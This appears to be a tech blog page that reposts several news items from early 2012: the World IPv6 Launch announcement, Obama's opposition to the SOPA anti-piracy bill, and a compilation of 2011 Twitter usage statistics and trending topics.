The Internet Society is organising World IPv6 Launch for 6 June 2012, when participating internet service providers, network equipment manufacturers and other service providers will permanently enable IPv6 on their connections, devices and services. The event is a follow-up to last year's World IPv6 Day. Google internet evangelist Vint Cerf said that he considers 6 June 2012 a turning point in internet history, and that it will create substantially more IP addresses for the internet as well as strengthen the net's end-to-end principle.

Participating internet service providers currently include AT&T, Comcast, Free Telecom, Internode, KDDI, Time Warner Cable and XS4ALL. Several companies – including Comcast, XS4ALL and the French Free Telecom service – already offer IPv6 to many of their internet customers. The announcement said that on 6 June, at least one per cent of each participating ISP's subscribers will be able to access the net via IPv6, and that this will happen largely automatically.

The list of participating hardware manufacturers currently only includes Cisco and D-Link, who plan to enable IPv6 by default on all home routers shipped from World IPv6 Launch Day onwards. Facebook, Google, Bing and Yahoo will also offer parallel (dual stack) IPv4 and IPv6 services from 6 June. Akamai and Limelight customers can add themselves to the list of participants via their CDN providers' infrastructures. Further participation details can be found on theWorld IPv6 Launch web site


18 January 2012

[Hình ảnh] Phản đối SOPA :)

Một số hình ảnh sưu tập được

[Security] Obama Says So Long SOPA, Killing Controversial Internet Piracy Legislation

The growing anti-SOPA (Stop Online Piracy Act) support that has swept through the gaming and Internet community found a very big ally today. With websites like Reddit and Wikipedia and gaming organizations like Major League Gaming prepared for a blackout on January 18th – the same day that the House Judiciary Committee hearing on HR 3261was scheduled in Washington, DC – President Barack Obama has stepped in and said he would not support the bill. SOPA has been killed, for now.

Much to the chagrin of Hollywood, the Entertainment Software Association (which has been a backer of the bill from early on), and Internet domain company GoDaddy.com (which lost many accounts as a result of its support for the bill); SOPA has been shelved. The Motion Picture Association of America, one of the bill’s largest sponsors, is expected to regroup.

California congressman Darrell Issa, who has been opposed to the bill from the beginning, praised the Internet action that has swept like a virus across the Web the past week.

“The voice of the Internet community has been heard,” said Issa. “Much more education for members of Congress about the workings of the Internet is essential if anti-piracy legislation is to be workable and achieve broad appeal.”

But there remains another similar bill, Protect IP (the Enforcing and Protecting American Rights Against Sites Intent on Theft and Exploitation Act), that poses a problem for gamers and Internet users. This legislation is scheduled to go before the Senate on January 24th.

Both SOPA and Protect IP attempt to combat online piracy by preventing American search engines like Google and Yahoo from directing users to sites distributing stolen content. Both bills also would enable people and companies to sue if their copyright was infringed. Obama has come out against both bills, which killed SOPA and puts pressure on senators come January 24th. The full White House response can be read here.

“Any provision covering Internet intermediaries such as online advertising networks, payment processors, or search engines must be transparent and designed to prevent overly broad private rights of action that could encourage unjustified litigation that could discourage startup businesses and innovative firms from growing,” said The White House. “We expect and encourage all private parties, including both content creators and Internet platform providers working together, to adopt voluntary measures and best practices to reduce online piracy.”

Just like piracy itself, this debate isn’t over. Expect more bills to move forward, although the wording in future legislation is expected to be more narrowly focused in an attempt to appease the current administration. But given the current economic climate and the upcoming Presidential election, there could be a different administration entering The White House soon, changing the landscape for these types of bills.


[Report] Twitter statistics 2011 by marketinggum

Twitter officially launched in 2006 and started its meteoric growth around January 2009, so how’s everything tracking in 2011? Let’s take a look at who’s doing what and how much of it they’re doing in these updated Twitter stats for 2011…

On March 14th this year Twitter celebrated it’s 5th birthday. The first tweet was sent on March 21st in 2006 by Jack Dorsey (Twitter’s creator).

According to Twitter, the record for the number of tweets per second (TPS) is 6,939, set at 4 seconds after midnight in Japan on New Year’s Day. This dwarfs the previous record of 456 TPS (on the day Michael Jackson died).

In 2007 the average was 5,000 tweets per day.
In 2008 that had grown to 300,000.
In 2009 tweets per day averaged 2.5 million.
In 2010 that number was 35 million tweets per day.

In the month of March 2011 alone, 140 million tweets are being sent on average per day.

Update: As of June 2011, users on Twitter are now averaging 200 million Tweets per day.

Below is a superb infographic from Digital Surgeons based on US Twitter stats from 2010 including gender, age, income and activity on Twitter:

As of June 2011, Alexa ranks Twitter 9th in the world’s most trafficked sites with Google.com in 1st position, Facebook 2nd and YouTube 3rd.

At a local level, Alexa ranks Twitter as the 12th most popular site in New Zealand with the rest of the top 15 as follows:

Google NZ
NZ Herald
Windows Live

From this awesome Twitter infographic by Digital Buzz (April 2010) we can see the most popular languages used on Twitter are:

English – 61%
Portugese – 11%
Japanese – 6%
Spanish – 4%

Based on April 2010 stats, Thursday and Friday are the most active days on Twitter, each accounting for 16% of total tweets.

This Hubspot report into over 9 million Twitter accounts (excluding celebrities) found that although men and women average the same number of followers, women follow 2% more people than men do and post over 12% more tweets than men.

It took 3 years, 2 months and 1 day to go from the first tweet to the billionth tweet. In 2011, 1 billion tweets are now sent every week.

Twitter use on mobile devices has increased by 182% in the past year (2010/2011).

Stats from Twitter, shared by Twitter at Chirp in 2010 (the official Twitter developer conference); Of Twitter’s active users, 37% use their phone to tweet.

From that same awesome Twitter infographic by Digital Buzz above (April 2010), we can see the top countries rank as follows:
US: 33.3%
India: 8.2%
Japan: 7.1%
Germany: 6.5%
UK: 5.9%
Brazil: 3.1%
Canada: 2.1%
Indonesia 2%
Australia: 1.8%
Spain: 1.7%

Based on number of followers, the top 10 Twitter users are (graph from infographic by Digital Buzz):

Twitter started in San Francisco and is still based there. From small beginnings the original Twitter team has grown to reach 400 employees in March 2011:

Number of employees:
Jan 2008: 8
Jan 2009: 29
Jan 2010: 130
Jan 2011: 350

In March 2011, an average of 460,000 new accounts were being created each day.

Here are Twitter’s top Trending Topics for the world from the first half of 2011, divided into two sections:

World events/News
AH1N1 – Swine Flu
Mubarak – former Egyptian President
Easter – Christian holiday
Cairo – capital of Egypt
#prayforjapan – sentiment following the March earthquake and tsunami
Chernobyl – site of nuclear disaster in 1986
Libia/Libya – site of an ongoing civil war
Fukushima – Japanese nuclear power plant
William & Kate – Newly-named Duke and Duchess of Cambridge
Gadafi – Libyan political leader
Pop culture
Rebecca Black – pop singer
Femme Fatale – newly-released Britney Spears album
Charlie Sheen – actor
#tigerblood – hashtag popularized by Charlie Sheen
Nate Dogg – rapper
Anderson Silva – Brazilian mixed martial artist
Tom & Jerry – famous cartoon
Mumford & Sons – British rock band
Bieber alert – referring to artist Justin Bieber
Queen Gaga – referring to artist Lady Gaga